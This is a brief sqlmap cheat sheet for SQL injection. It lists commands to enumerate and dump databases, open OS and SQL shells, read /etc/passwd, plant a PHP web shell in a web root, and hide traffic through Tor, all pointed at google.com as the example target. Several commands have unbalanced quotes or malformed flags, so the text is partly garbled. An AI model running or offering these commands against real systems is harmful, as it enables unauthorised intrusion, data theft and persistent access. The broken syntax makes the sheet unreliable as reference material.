Installation

Macos

brew install sqlmap

Linux

sudo apt install sqlmap

Go-to Commands

sqlmap -u "https://google.com/?q=1" --dbs --no-cast --random-agent

Get data

All databases

sqlmap -u "https://google.com/?q=1 --dbs

All tables in db

sqlmap -u "https://google.com/?q=1 --tables -D "DB-NAME"

All columns in table

sqlmap -u "https://google.com/?q=1 -D "DB-NAME" -T "TABLE-NAME" -columns

Dumped contents

sqlmap -u "https://google.com/?q=1 -D "DB-NAME" -T "TABLE-NAME" -dump

Get Shell

Get OS Shell

sqlmap -u "https://google.com/?q=1 --os-shell

Get SQL Shell

sqlmap -u "https://google.com/?q=1 --sql-shell

File

Read File

sqlmap -u "https://google.com/?q=1" --file-read '/etc/passwd'

Write File

sqlmap -u "https://google.com/?q=1" --file-write './shell.php' --file-dest '/apache/public/shell.php'

With Tor

sqlmap -u "https://google.com/?q=1" --tor --tor-type=SOCKS5

Scanning to X

Scanning to selected param

sqlmap -u "https://google.com/?q=1&b=1" -p q

 $ sqlmap -u "https://google.com/?q=1 \
 --cookie "abcd=1234; xcccc=1234; bgdfg=124" \ 
 -p abcd \
 --param-filter='COOKIE' \
 --level 2

조건